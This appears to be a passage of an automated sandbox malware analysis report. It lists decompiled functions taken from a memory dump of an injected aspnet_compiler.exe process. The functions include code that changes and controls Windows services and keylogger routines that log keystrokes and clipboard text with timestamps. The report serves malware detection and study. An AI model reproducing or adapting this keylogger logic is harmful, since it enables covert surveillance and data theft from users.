                    0x00419821
                    0x0041982b
                    0x0041982b
                    0x0041982b
                    0x0041981f
                    0x0041981a
                    0x00419848
                    0x0041984b
                    0x0041984e
                    0x00419803
                    0x00419804
                    0x00419804
                    0x00419853
                    0x00419860

                    APIs
                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,00418EE9,00000000), ref: 004197E3
                    • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,00418EE9,00000000), ref: 004197F7
                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,00418EE9,00000000), ref: 00419804
                    • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00418EE9,00000000), ref: 00419839
                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,00418EE9,00000000), ref: 0041984B
                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,00418EE9,00000000), ref: 0041984E
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: Service$CloseHandle$Open$ChangeConfigManager
                    • String ID:
                    • API String ID: 493672254-0
                    • Opcode ID: a43a9075f9a256d01b940b957f891354bde14e8d54348ae68c94c0b261ae2992
                    • Instruction ID: a47b9f36788e1574db55dd564176aee803a97132f2343e107bd38cafad37238b
                    • Opcode Fuzzy Hash: a43a9075f9a256d01b940b957f891354bde14e8d54348ae68c94c0b261ae2992
                    • Instruction Fuzzy Hash: 280149311592147AD6146B34AC6EEBB3B9CDB03770F10033BF525921D2DA68CD45C1E9
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00446A95 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                    Download Yara Rule
                    C-Code - Quality: 75%
                    			E00446A95(void* __ebx, void* __ecx, void* __edx) {
				void* __edi;
				void* __esi;
				intOrPtr _t2;
				void* _t3;
				void* _t4;
				intOrPtr _t9;
				void* _t11;
				void* _t20;
				void* _t21;
				void* _t23;
				void* _t25;
				void* _t27;
				void* _t29;
				void* _t31;
				void* _t32;
				long _t36;
				long _t37;
				void* _t40;

				_t29 = __edx;
				_t23 = __ecx;
				_t20 = __ebx;
				_t36 = GetLastError();
				_t2 =  *0x46f1dc; // 0x6
				_t42 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L2:
					_t3 = E004443F4(_t23, 1, 0x364);
					_t31 = _t3;
					_pop(_t25);
					if(_t31 != 0) {
						_t4 = E00447092(_t25, _t36, __eflags,  *0x46f1dc, _t31);
						__eflags = _t4;
						if(_t4 != 0) {
							E00446907(_t25, _t31, 0x470664);
							E00445002(0);
							_t40 = _t40 + 0xc;
							__eflags = _t31;
							if(_t31 == 0) {
								goto L9;
							} else {
								goto L8;
							}
						} else {
							_push(_t31);
							goto L4;
						}
					} else {
						_push(_t3);
						L4:
						E00445002();
						_pop(_t25);
						L9:
						SetLastError(_t36);
						E004449F5(_t20, _t29, _t31, _t36);
						asm("int3");
						_push(_t20);
						_push(_t36);
						_push(_t31);
						_t37 = GetLastError();
						_t21 = 0;
						_t9 =  *0x46f1dc; // 0x6
						_t45 = _t9 - 0xffffffff;
						if(_t9 == 0xffffffff) {
							L12:
							_t32 = E004443F4(_t25, 1, 0x364);
							_pop(_t27);
							if(_t32 != 0) {
								_t11 = E00447092(_t27, _t37, __eflags,  *0x46f1dc, _t32);
								__eflags = _t11;
								if(_t11 != 0) {
									E00446907(_t27, _t32, 0x470664);
									E00445002(_t21);
									__eflags = _t32;
									if(_t32 != 0) {
										goto L19;
									} else {
										goto L18;
									}
								} else {
									_push(_t32);
									goto L14;
								}
							} else {
								_push(_t21);
								L14:
								E00445002();
								L18:
								SetLastError(_t37);
							}
						} else {
							_t32 = E0044703C(_t25, _t37, _t45, _t9);
							if(_t32 != 0) {
								L19:
								SetLastError(_t37);
								_t21 = _t32;
							} else {
								goto L12;
							}
						}
						return _t21;
					}
				} else {
					_t31 = E0044703C(_t23, _t36, _t42, _t2);
					if(_t31 != 0) {
						L8:
						SetLastError(_t36);
						return _t31;
					} else {
						goto L2;
					}
				}
			}





















                    0x00446a95
                    0x00446a95
                    0x00446a95
                    0x00446a9f
                    0x00446aa1
                    0x00446aa6
                    0x00446aa9
                    0x00446ab7
                    0x00446abe
                    0x00446ac3
                    0x00446ac6
                    0x00446ac9
                    0x00446adb
                    0x00446ae0
                    0x00446ae2
                    0x00446aed
                    0x00446af4
                    0x00446af9
                    0x00446afc
                    0x00446afe
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00446ae4
                    0x00446ae4
                    0x00000000
                    0x00446ae4
                    0x00446acb
                    0x00446acb
                    0x00446acc
                    0x00446acc
                    0x00446ad1
                    0x00446b0c
                    0x00446b0d
                    0x00446b13
                    0x00446b18
                    0x00446b1b
                    0x00446b1c
                    0x00446b1d
                    0x00446b24
                    0x00446b26
                    0x00446b28
                    0x00446b2d
                    0x00446b30
                    0x00446b3e
                    0x00446b4a
                    0x00446b4d
                    0x00446b50
                    0x00446b62
                    0x00446b67
                    0x00446b69
                    0x00446b74
                    0x00446b7a
                    0x00446b82
                    0x00446b84
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00446b6b
                    0x00446b6b
                    0x00000000
                    0x00446b6b
                    0x00446b52
                    0x00446b52
                    0x00446b53
                    0x00446b53
                    0x00446b86
                    0x00446b87
                    0x00446b87
                    0x00446b32
                    0x00446b38
                    0x00446b3c
                    0x00446b8f
                    0x00446b90
                    0x00446b96
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00446b3c
                    0x00446b9d
                    0x00446b9d
                    0x00446aab
                    0x00446ab1
                    0x00446ab5
                    0x00446b00
                    0x00446b01
                    0x00446b0b
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00446ab5

                    APIs
                    • GetLastError.KERNEL32(00000020,?,004390F5,?,?,?,0043E278,?,?,00000020,00000000,?,?,?,0042C60C,0000003B), ref: 00446A99
                    • _free.LIBCMT ref: 00446ACC
                    • _free.LIBCMT ref: 00446AF4
                    • SetLastError.KERNEL32(00000000,0043E278,?,?,00000020,00000000,?,?,?,0042C60C,0000003B,?,00000041,00000000,00000000), ref: 00446B01
                    • SetLastError.KERNEL32(00000000,0043E278,?,?,00000020,00000000,?,?,?,0042C60C,0000003B,?,00000041,00000000,00000000), ref: 00446B0D
                    • _abort.LIBCMT ref: 00446B13
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLast$_free$_abort
                    • String ID:
                    • API String ID: 3160817290-0
                    • Opcode ID: 806b9488dbb5f67dc4a24e364a824df2f5f943de60d9707ff7ce2e9c29f9cb7b
                    • Instruction ID: 6a8f3ccd0764d1e9e7d83ebdae3328841d1b307594cb58bb8d86c94d160514c2
                    • Opcode Fuzzy Hash: 806b9488dbb5f67dc4a24e364a824df2f5f943de60d9707ff7ce2e9c29f9cb7b
                    • Instruction Fuzzy Hash: 9FF0D675105B0166F612B325BC06E6B2A558BD3B69F22403BF904E22D2EF6DC806816E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00419601 Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E00419601(char _a4) {
				struct _SERVICE_STATUS _v32;
				signed int _t16;
				void* _t19;
				void* _t20;

				_t16 = 0;
				_t20 = OpenSCManagerW(0, 0, 0x20);
				_t19 = OpenServiceW(_t20, E00401EE4( &_a4), 0x20);
				if(_t19 != 0) {
					_t16 = 0 | ControlService(_t19, 1,  &_v32) != 0x00000000;
					CloseServiceHandle(_t20);
					CloseServiceHandle(_t19);
				} else {
					CloseServiceHandle(_t20);
				}
				E00401EE9();
				return _t16;
			}







                    0x0041960c
                    0x0041961b
                    0x0041962a
                    0x0041962e
                    0x0041964f
                    0x00419652
                    0x00419655
                    0x00419630
                    0x00419631
                    0x00419631
                    0x0041965a
                    0x00419667

                    APIs
                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,0041917E,00000000), ref: 00419610
                    • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041917E,00000000), ref: 00419624
                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041917E,00000000), ref: 00419631
                    • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041917E,00000000), ref: 00419640
                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041917E,00000000), ref: 00419652
                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041917E,00000000), ref: 00419655
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: Service$CloseHandle$Open$ControlManager
                    • String ID:
                    • API String ID: 221034970-0
                    • Opcode ID: cbdbfd916c004d7569b47b9bd6e1a80b4622c8ade61d2382c09d422603b39a17
                    • Instruction ID: a7ca8c43b745447570174616d627e1def875c64aa7390fdce4b26778a5b79433
                    • Opcode Fuzzy Hash: cbdbfd916c004d7569b47b9bd6e1a80b4622c8ade61d2382c09d422603b39a17
                    • Instruction Fuzzy Hash: 4EF0C2315003186BD210AF65AC89DBF3BECDB45BA1F00007AFD09921D2DA28CD4685F9
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0041976C Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E0041976C(char _a4) {
				struct _SERVICE_STATUS _v32;
				signed int _t16;
				void* _t19;
				void* _t20;

				_t16 = 0;
				_t20 = OpenSCManagerW(0, 0, 0x40);
				_t19 = OpenServiceW(_t20, E00401EE4( &_a4), 0x40);
				if(_t19 != 0) {
					_t16 = 0 | ControlService(_t19, 3,  &_v32) != 0x00000000;
					CloseServiceHandle(_t20);
					CloseServiceHandle(_t19);
				} else {
					CloseServiceHandle(_t20);
				}
				E00401EE9();
				return _t16;
			}







                    0x00419777
                    0x00419786
                    0x00419795
                    0x00419799
                    0x004197ba
                    0x004197bd
                    0x004197c0
                    0x0041979b
                    0x0041979c
                    0x0041979c
                    0x004197c5
                    0x004197d2

                    APIs
                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041907E,00000000), ref: 0041977B
                    • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041907E,00000000), ref: 0041978F
                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041907E,00000000), ref: 0041979C
                    • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,0041907E,00000000), ref: 004197AB
                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041907E,00000000), ref: 004197BD
                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041907E,00000000), ref: 004197C0
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: Service$CloseHandle$Open$ControlManager
                    • String ID:
                    • API String ID: 221034970-0
                    • Opcode ID: ffd2befe680986fb8d9ca3f791f35c957ef4c0d05e77ac45e50e77df66c7c54e
                    • Instruction ID: a5790d775f0640958528a35b07e9f071147c503c7fab8b2ef1513a048adfe726
                    • Opcode Fuzzy Hash: ffd2befe680986fb8d9ca3f791f35c957ef4c0d05e77ac45e50e77df66c7c54e
                    • Instruction Fuzzy Hash: 62F0C271501218ABD210AF65EC89DBF3BECDF45BA5B00007AFE09921D2DA38CD4685E9
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00419705 Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E00419705(char _a4) {
				struct _SERVICE_STATUS _v32;
				signed int _t16;
				void* _t19;
				void* _t20;

				_t16 = 0;
				_t20 = OpenSCManagerW(0, 0, 0x40);
				_t19 = OpenServiceW(_t20, E00401EE4( &_a4), 0x40);
				if(_t19 != 0) {
					_t16 = 0 | ControlService(_t19, 2,  &_v32) != 0x00000000;
					CloseServiceHandle(_t20);
					CloseServiceHandle(_t19);
				} else {
					CloseServiceHandle(_t20);
				}
				E00401EE9();
				return _t16;
			}







                    0x00419710
                    0x0041971f
                    0x0041972e
                    0x00419732
                    0x00419753
                    0x00419756
                    0x00419759
                    0x00419734
                    0x00419735
                    0x00419735
                    0x0041975e
                    0x0041976b

                    APIs
                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,004190FE,00000000), ref: 00419714
                    • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,004190FE,00000000), ref: 00419728
                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004190FE,00000000), ref: 00419735
                    • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,004190FE,00000000), ref: 00419744
                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004190FE,00000000), ref: 00419756
                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004190FE,00000000), ref: 00419759
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: Service$CloseHandle$Open$ControlManager
                    • String ID:
                    • API String ID: 221034970-0
                    • Opcode ID: 8b303968575a6564753f9d8b246513a52dc4537e48e1e6f0537c890e477d9e22
                    • Instruction ID: 8fc70a690c960e854b45078eaab18319365206aebec4e159bed8ee303a354907
                    • Opcode Fuzzy Hash: 8b303968575a6564753f9d8b246513a52dc4537e48e1e6f0537c890e477d9e22
                    • Instruction Fuzzy Hash: 74F0C2715002186BD210AF65AC89DBF3BECDF45BA1F40007AFE09A61D2DB38CD4585E9
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00441D05 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 116COMMON
                    Download Yara Rule
                    C-Code - Quality: 88%
                    			E00441D05(void* __ecx, void* __edx, intOrPtr _a4) {
				signed int _v8;
				void* _v12;
				char _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t36;
				struct HINSTANCE__* _t37;
				struct HINSTANCE__* _t43;
				intOrPtr* _t44;
				intOrPtr* _t45;
				CHAR* _t49;
				struct HINSTANCE__* _t50;
				void* _t52;
				struct HINSTANCE__* _t55;
				intOrPtr* _t59;
				struct HINSTANCE__* _t64;
				intOrPtr _t65;

				_t52 = __ecx;
				if(_a4 == 2 || _a4 == 1) {
					E0044D8D9(_t52);
					GetModuleFileNameA(0, 0x4703d8, 0x104);
					_t49 =  *0x470a50; // 0xec3458
					 *0x470a58 = 0x4703d8;
					if(_t49 == 0 ||  *_t49 == 0) {
						_t49 = 0x4703d8;
					}
					_v8 = 0;
					_v16 = 0;
					E00441E29(_t52, _t49, 0, 0,  &_v8,  &_v16);
					_t64 = E00441F9E(_v8, _v16, 1);
					if(_t64 != 0) {
						E00441E29(_t52, _t49, _t64, _t64 + _v8 * 4,  &_v8,  &_v16);
						if(_a4 != 1) {
							_v12 = 0;
							_push( &_v12);
							_t50 = E0044D3F4(_t49, 0, _t64, _t64);
							if(_t50 == 0) {
								_t59 = _v12;
								_t55 = 0;
								_t36 = _t59;
								if( *_t59 == 0) {
									L15:
									_t37 = 0;
									 *0x470a44 = _t55;
									_v12 = 0;
									_t50 = 0;
									 *0x470a48 = _t59;
									L16:
									E00445002(_t37);
									_v12 = 0;
									goto L17;
								} else {
									goto L14;
								}
								do {
									L14:
									_t36 = _t36 + 4;
									_t55 =  &(_t55->i);
								} while ( *_t36 != 0);
								goto L15;
							}
							_t37 = _v12;
							goto L16;
						}
						 *0x470a44 = _v8 - 1;
						_t43 = _t64;
						_t64 = 0;
						 *0x470a48 = _t43;
						goto L10;
					} else {
						_t44 = E0043EEAD();
						_push(0xc);
						_pop(0);
						 *_t44 = 0;
						L10:
						_t50 = 0;
						L17:
						E00445002(_t64);
						return _t50;
					}
				} else {
					_t45 = E0043EEAD();
					_t65 = 0x16;
					 *_t45 = _t65;
					E0043A5BB();
					return _t65;
				}
			}





















                    0x00441d05
                    0x00441d12
                    0x00441d32
                    0x00441d45
                    0x00441d4b
                    0x00441d51
                    0x00441d59
                    0x00441d60
                    0x00441d60
                    0x00441d65
                    0x00441d6c
                    0x00441d73
                    0x00441d85
                    0x00441d8c
                    0x00441dab
                    0x00441db7
                    0x00441dd2
                    0x00441dd5
                    0x00441ddc
                    0x00441de2
                    0x00441de9
                    0x00441dec
                    0x00441dee
                    0x00441df2
                    0x00441dfc
                    0x00441dfc
                    0x00441dfe
                    0x00441e04
                    0x00441e07
                    0x00441e09
                    0x00441e0f
                    0x00441e10
                    0x00441e16
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00441df4
                    0x00441df4
                    0x00441df4
                    0x00441df7
                    0x00441df8
                    0x00000000
                    0x00441df4
                    0x00441de4
                    0x00000000
                    0x00441de4
                    0x00441dbd
                    0x00441dc2
                    0x00441dc4
                    0x00441dc6
                    0x00000000
                    0x00441d8e
                    0x00441d8e
                    0x00441d93
                    0x00441d95
                    0x00441d96
                    0x00441dcb
                    0x00441dcb
                    0x00441e19
                    0x00441e1a
                    0x00000000
                    0x00441e23
                    0x00441d1a
                    0x00441d1a
                    0x00441d21
                    0x00441d22
                    0x00441d24
                    0x00000000
                    0x00441d29

                    APIs
                    • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe,00000104), ref: 00441D45
                    • _free.LIBCMT ref: 00441E10
                    • _free.LIBCMT ref: 00441E1A
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$FileModuleName
                    • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe$X4
                    • API String ID: 2506810119-1644649123
                    • Opcode ID: fb92f241e2e05432639b7b32ac1502f6d059981408861d6403be201cf46156aa
                    • Instruction ID: c557cc44e93a4f3526c8424d226de774fcc48449be6b5aaf792980d9704e92f2
                    • Opcode Fuzzy Hash: fb92f241e2e05432639b7b32ac1502f6d059981408861d6403be201cf46156aa
                    • Instruction Fuzzy Hash: 663173B5E01258EFEB21DB99D88199FBBBCEB44314F10406BF80897221D6749A818799
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040ACBE Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 88COMMON
                    Download Yara Rule
                    C-Code - Quality: 96%
                    			E0040ACBE(void* __ecx) {
				char _v28;
				char _v52;
				char _v76;
				char _v100;
				char _v124;
				char _v148;
				void* __ebx;
				void* __esi;
				void* __ebp;
				void* _t23;
				void* _t27;
				void* _t30;
				void* _t78;
				void* _t84;
				void* _t85;
				void* _t86;

				_t86 = _t85 - 0x94;
				_t78 = __ecx;
				if( *0x474c4c >  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x2c])) + 4))) {
					E00432CF1(0x474c4c);
					_t89 =  *0x474c4c - 0xffffffff;
					if( *0x474c4c == 0xffffffff) {
						E00401F66(0x474c50, 0x474c50);
						E0043307B(_t89, E004568E0);
						E00432CB2(0x474c4c, 0x474c4c);
					}
				}
				E0040AC84( &_v28);
				_t23 = E0040AF46(0x474c50);
				_t90 = _t23;
				if(_t23 == 0) {
					E0040AE66(0x474c50,  &_v28);
					_t27 = E00406E2B(_t90);
					_t91 = _t27;
					if(_t27 != 0) {
						E00402073(0x474c50,  &_v76, 0x46a8f0, _t84, "\r\n[End of clipboard]\r\n");
						E00402073(0x474c50,  &_v52, 0x46a8f0, _t84, "\r\n[Text copied to clipboard]\r\n");
						_t30 = E0041A7B9( &_v148,  &_v76);
						E00402F85(_t86 - 0x18, E004042FD(0x474c50,  &_v100, E0041A7B9( &_v124,  &_v52), _t84, _t91, 0x474c50), _t30);
						E00409BA9(_t78);
						E00401EE9();
						E00401EE9();
						E00401EE9();
						E00401FB8();
						E00401FB8();
					}
				}
				return E00401EE9();
			}



















                    0x0040acc7
                    0x0040acdc
                    0x0040ace4
                    0x0040acec
                    0x0040acf1
                    0x0040acf9
                    0x0040acfd
                    0x0040ad07
                    0x0040ad0d
                    0x0040ad13
                    0x0040acf9
                    0x0040ad18
                    0x0040ad22
                    0x0040ad27
                    0x0040ad29
                    0x0040ad35
                    0x0040ad42
                    0x0040ad47
                    0x0040ad49
                    0x0040ad57
                    0x0040ad64
                    0x0040ad72
                    0x0040ad98
                    0x0040ada0
                    0x0040ada8
                    0x0040adb0
                    0x0040adbb
                    0x0040adc3
                    0x0040adcb
                    0x0040adcb
                    0x0040ad49
                    0x0040adde

                    APIs
                      • Part of subcall function 0043307B: __onexit.LIBCMT ref: 00433081
                    • __Init_thread_footer.LIBCMT ref: 0040AD0D
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: Init_thread_footer__onexit
                    • String ID: [End of clipboard]$[Text copied to clipboard]$LLG$PLG
                    • API String ID: 1881088180-1960277357
                    • Opcode ID: bce6224759d8b1a9d387bf662963ac59f505a4551bebfb2ec8e10d21e722365f
                    • Instruction ID: 8d56320deb120d659c296c02e5f33f036aa5d094007c574b007f3df0111b0a83
                    • Opcode Fuzzy Hash: bce6224759d8b1a9d387bf662963ac59f505a4551bebfb2ec8e10d21e722365f
                    • Instruction Fuzzy Hash: 8121A2319102054BCB14FBA6D9829EDB379AF84308F10007FE505731D2EF3C5E4A8A9D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040977E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 70threadCOMMON
                    Download Yara Rule
                    C-Code - Quality: 85%
                    			E0040977E(void* __ecx, char* __edx, char _a4) {
				char _v28;
				char _v32;
				void* _v56;
				void* __ebx;
				void* __edi;
				void* __ebp;
				void* _t21;
				void* _t39;
				void* _t41;
				signed int _t42;
				void* _t44;

				_t33 = __edx;
				_t44 = (_t42 & 0xfffffff8) - 0x1c;
				_push(_t21);
				_t39 = __ecx;
				 *((char*)(__ecx + 0x49)) = 1;
				E0040AE66(__ecx + 0x60,  &_a4);
				_t48 =  *0x46f9d4 - 0x32;
				_t35 = "Offline Keylogger Started";
				if( *0x46f9d4 != 0x32) {
					E00402073(_t21,  &_v28, __edx, _t41, "Offline Keylogger Started");
					_t44 = _t44 - 0x18;
					_t33 =  &_v32;
					E0041A7B9(_t44,  &_v32);
					E0040A6DA(_t21, _t39, _t48);
					E00401FB8();
				}
				_t45 = _t44 - 0x18;
				E00402073(_t21, _t44 - 0x18, _t33, _t41, _t35);
				E00402073(_t21, _t45 - 0x18, _t33, _t41, "i");
				E0041A04A(_t21, _t35);
				CreateThread(0, 0, E00409880, _t39, 0, 0);
				if( *_t39 == 0) {
					CreateThread(0, 0, E0040986A, _t39, 0, 0);
				}
				CreateThread(0, 0, E0040988C, _t39, 0, 0);
				return E00401EE9();
			}














                    0x0040977e
                    0x00409784
                    0x0040978a
                    0x0040978c
                    0x00409793
                    0x00409797
                    0x0040979c
                    0x004097a3
                    0x004097a8
                    0x004097af
                    0x004097b4
                    0x004097b7
                    0x004097bd
                    0x004097c4
                    0x004097cd
                    0x004097cd
                    0x004097d2
                    0x004097d8
                    0x004097e7
                    0x004097ec
                    0x00409806
                    0x0040980a
                    0x00409816
                    0x00409816
                    0x00409822
                    0x00409832

                    APIs
                    • CreateThread.KERNEL32 ref: 00409806
                    • CreateThread.KERNEL32 ref: 00409816
                    • CreateThread.KERNEL32 ref: 00409822
                      • Part of subcall function 0040A6DA: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040A6E8
                      • Part of subcall function 0040A6DA: wsprintfW.USER32 ref: 0040A769
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: CreateThread$LocalTimewsprintf
                    • String ID: Offline Keylogger Started$Cqt
                    • API String ID: 465354869-147018579
                    • Opcode ID: f0a8aaaf13eaf1ef8eba7d289878dc0b5e24511a7e625f216783a31bc4cc7b6f
                    • Instruction ID: de04d47bbc5f4bbdcfa168c24a1029e81d3d9c9d0fe0406f7b4d0e9c742a0715
                    • Opcode Fuzzy Hash: f0a8aaaf13eaf1ef8eba7d289878dc0b5e24511a7e625f216783a31bc4cc7b6f
                    • Instruction Fuzzy Hash: CC1198A25003087AD214BB769C86DBB7A5CDA82398B40457FF845222C3DA785E19C6FE
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040A6DA Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 68timeCOMMON
                    Download Yara Rule
                    C-Code - Quality: 53%
                    			E0040A6DA(void* __ebx, void* __ecx, void* __eflags, char _a4) {
				struct _SYSTEMTIME _v20;
				char _v44;
				char _v68;
				void* __edi;
				void* __esi;
				void* __ebp;
				WCHAR* _t28;
				void* _t61;
				void* _t62;
				void* _t64;
				void* _t65;
				void* _t66;

				_t66 = __eflags;
				_t61 = __ecx;
				GetLocalTime( &_v20);
				E00401EF3( &_a4, _t21, _t62, E00402FF4(__ebx,  &_v44, E0040AEF6( &_v68, L"\r\n[%04i/%02i/%02i %02i:%02i:%02i ", _t64,  &_a4), _t61, _t64, _t66, L"]\r\n"));
				E00401EE9();
				E00401EE9();
				_push(0x64 + E0040245C() * 2);
				_t28 = E0043A620( &_a4);
				_push(_v20.wSecond & 0x0000ffff);
				_push(_v20.wMinute & 0x0000ffff);
				_push(_v20.wHour & 0x0000ffff);
				_push(_v20.wDay & 0x0000ffff);
				_push(_v20.wMonth & 0x0000ffff);
				wsprintfW(_t28, E00401EE4( &_a4));
				E0040415E(__ebx, _t65, _t21, _t64, _t28);
				E00409BA9(_t61, _v20.wYear & 0x0000ffff);
				L0043A61B(_t28);
				return E00401EE9();
			}















                    0x0040a6da
                    0x0040a6e5
                    0x0040a6e8
                    0x0040a714
                    0x0040a71c
                    0x0040a724
                    0x0040a738
                    0x0040a739
                    0x0040a749
                    0x0040a74e
                    0x0040a753
                    0x0040a758
                    0x0040a75d
                    0x0040a769
                    0x0040a774
                    0x0040a77b
                    0x0040a781
                    0x0040a794

                    APIs
                    • GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040A6E8
                    • wsprintfW.USER32 ref: 0040A769
                      • Part of subcall function 00409BA9: SetEvent.KERNEL32(?,?,00000000,0040A780,00000000), ref: 00409BD5
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: EventLocalTimewsprintf
                    • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                    • API String ID: 1497725170-248792730
                    • Opcode ID: 32357c172c65e3e86690e16cf429876f5f69846ecaa77e64d4a2669dd2ca6b82
                    • Instruction ID: 67f2dfcb9da7a84066df1aeb29efb07d6386f75bf98186ef1d39347a66652dd1
                    • Opcode Fuzzy Hash: 32357c172c65e3e86690e16cf429876f5f69846ecaa77e64d4a2669dd2ca6b82
                    • Instruction Fuzzy Hash: 44114272404118AACB18FB96EC968FF77B8EE48315B00012FF842661D1EF7C5A45D6AD
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0041BE1A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 57registryCOMMON
                    Download Yara Rule
                    C-Code - Quality: 70%
                    			E0041BE1A() {
				char _v20;
				struct _WNDCLASSEXA _v68;
				void* __edi;
				struct HWND__* _t20;
				void* _t23;

				E00435760(_t23,  &(_v68.style), 0, 0x2c);
				_v68.cbSize = 0x30;
				_v68.style = 0;
				_v68.lpfnWndProc = E0041BE9A;
				_v68.cbClsExtra = 0;
				asm("movsd");
				_v68.lpszClassName =  &_v20;
				_v68.cbWndExtra = 0;
				asm("movsd");
				_v68.lpszMenuName = 0;
				asm("movsd");
				asm("movsw");
				asm("movsb");
